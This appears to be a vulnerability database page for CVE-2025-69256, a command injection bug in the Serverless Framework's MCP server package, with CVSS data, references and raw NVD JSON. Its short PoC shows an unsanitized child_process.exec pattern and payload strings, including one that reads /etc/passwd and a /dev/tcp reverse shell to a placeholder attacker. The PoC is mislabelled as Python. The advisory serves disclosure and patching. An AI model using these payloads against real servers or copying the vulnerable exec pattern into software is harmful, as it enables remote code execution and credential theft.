CVE-2025-69256

Description

The Serverless Framework is a framework for using AWS Lambda and other managed cloud services to build applications. Starting in version 4.29.0 and prior to version 4.29.3, a command injection vulnerability exists in the Serverless Framework's built-in MCP server package (@serverless/mcp). This vulnerability only affects users of the experimental MCP server feature (serverless mcp), which represents less than 0.1% of Serverless Framework users. The core Serverless Framework CLI and deployment functionality are not affected. The vulnerability is caused by the unsanitized use of input parameters within a call to `child_process.exec`, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (`|`, `>`, `&&`, etc.). Version 4.29.3 fixes the issue.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:serverless:serverless:*:*:*:*:*:*:*:* - VULNERABLE

Serverless Framework >= 4.29.0 且 < 4.29.3

@serverless/mcp < 4.29.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-69256 PoC - Command Injection in @serverless/mcp
// This PoC demonstrates how shell metacharacters can be injected

const { exec } = require('child_process');

// Vulnerable code pattern (simplified from list-projects.js)
function vulnerableFunction(userInput) {
  // Direct injection into shell command without sanitization
  const command = `some-command ${userInput}`;
  exec(command, (error, stdout, stderr) => {
    console.log(stdout);
  });
}

// PoC payloads:
// 1. Basic command injection:
// userInput = 'test; cat /etc/passwd'

// 2. Using pipe operator:
// userInput = 'test | whoami'

// 3. Using AND operator:
// userInput = 'test && id'

// 4. Reverse shell attempt:
// userInput = 'test; bash -i >& /dev/tcp/attacker/port 0>&1'

// Example exploitation:
vulnerableFunction('test; cat /etc/passwd');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69256
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69256
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69256/
[4] VulDB https://vuldb.com/cve/CVE-2025-69256
[5] https://github.com/serverless/serverless/blob/6213453da7df375aaf12fb3522ab8870488fc59a/packages/mcp/src/tools/list-projects.js#L68
[6] https://github.com/serverless/serverless/commit/681ca039550c7169369f98780c6301a00f2dc4c4
[7] https://github.com/serverless/serverless/releases/tag/sf-core%404.29.3
[8] https://github.com/serverless/serverless/security/advisories/GHSA-rwc2-f344-q6w6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69256", "sourceIdentifier": "[email protected]", "published": "2025-12-30T19:15:45.180", "lastModified": "2026-03-23T14:42:33.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Serverless Framework is a framework for using AWS Lambda and other managed cloud services to build applications. Starting in version 4.29.0 and prior to version 4.29.3, a command injection vulnerability exists in the Serverless Framework's built-in MCP server package (@serverless/mcp). This vulnerability only affects users of the experimental MCP server feature (serverless mcp), which represents less than 0.1% of Serverless Framework users. The core Serverless Framework CLI and deployment functionality are not affected. The vulnerability is caused by the unsanitized use of input parameters within a call to `child_process.exec`, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (`|`, `>`, `&&`, etc.). Version 4.29.3 fixes the issue."}, {"lang": "es", "value": "El Serverless Framework es un framework para usar AWS Lambda y otros servicios en la nube gestionados para construir aplicaciones. A partir de la versión 4.29.0 y antes de la versión 4.29.3, existe una vulnerabilidad de inyección de comandos en el paquete de servidor MCP integrado del Serverless Framework (@serverless/mcp). Esta vulnerabilidad solo afecta a los usuarios de la característica experimental del servidor MCP (serverless mcp), lo que representa menos del 0.1% de los usuarios del Serverless Framework. La CLI y la funcionalidad de despliegue principales del Serverless Framework no se ven afectadas. La vulnerabilidad es causada por el uso no saneado de parámetros de entrada dentro de una llamada a `child_process.exec`, lo que permite a un atacante inyectar comandos de sistema arbitrarios. La explotación exitosa puede llevar a la ejecución remota de código bajo los privilegios del proceso del servidor. El servidor construye y ejecuta comandos de shell utilizando entrada de usuario no validada directamente dentro de cadenas de línea de comandos. Esto introduce la posibilidad de inyección de metacaracteres de shell ('|', '>', '&&', etc.). La versión 4.29.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:serverless:serverless:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.29.0", "versionEndExcluding": "4.29.3", "matchCriteriaId": "0D5CF019-E00F-4F65-ADEA-F4C5A651B2BF"}]}]}], "references": [{"url": "https://github.com/serverless/serverless/blob/6213453da7df375aaf12fb3522ab8870488fc59a/packages/mcp/src/tools/list-projects.js#L68", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/serverless/serverless/commit/681ca039550c7169369f98780c6301a00f2dc4c4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/serverless/serverless/releases/tag/sf-core%404.29.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/serverless/serverless/security/advisories/GHSA-rwc2-f344-q6w6", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}